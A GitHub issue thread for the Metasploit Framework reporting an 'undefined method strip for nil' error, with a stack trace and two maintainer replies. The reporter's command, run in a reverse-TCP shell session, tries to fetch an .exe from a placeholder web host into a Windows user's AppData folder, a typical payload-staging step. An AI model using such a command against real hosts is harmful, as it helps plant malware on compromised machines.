### ISSUE TITLE
undefined method `strip' for nil:NilClass

### ISSUE THREAD

**Issue by Explorer1092** [rapid7/metasploit-framework#11725]
## Steps to reproduce

How'd you do it?

use python/shell_reverse_tcp_ssl

## Expected behavior

What should happen?

## Current behavior

[shell]> download http://ccccc.com/a.exe C:\Users\cccc\AppData\Roaming\aaa.exe

[-] Session manipulation failed: undefined method `strip' for nil:NilClass ["/usr/src/metasploit-framework/lib/msf/base/sessions/command_shell.rb:350:in `file_exists'", "/usr/src/metasploit-framework/lib/msf/base/sessions/command_shell.rb:375:in `cmd_download'", "/usr/src/metasploit-framework/lib/msf/base/sessions/command_shell.rb:604:in `run_builtin_cmd'", "/usr/src/metasploit-framework/lib/msf/base/sessions/command_shell.rb:592:in `run_single'", "/usr/src/metasploit-framework/lib/msf/base/sessions/command_shell.rb:761:in `_interact_stream'", "/usr/src/metasploit-framework/lib/msf/base/sessions/command_shell.rb:745:in `_interact'", "/usr/src/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'", "/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1363:in `cmd_sessions'", "/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:522:in `run_command'", "/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:473:in `block in run_single'", "/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:467:in `each'", "/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:467:in `run_single'", "/usr/src/metasploit-framework/lib/rex/ui/text/shell.rb:151:in `run'", "/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "./msfconsole:49:in `<main>'"]

### Metasploit version

Framework: 5.0.16-dev
Console  : 5.0.16-dev

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?

**Comment by timwr** [comment]
The download command is meant for file paths not web URLs. You can use curl or wget if you want to download a web URL.

**Comment by wvu-r7** [comment]
This should not report a `nil` error either way.
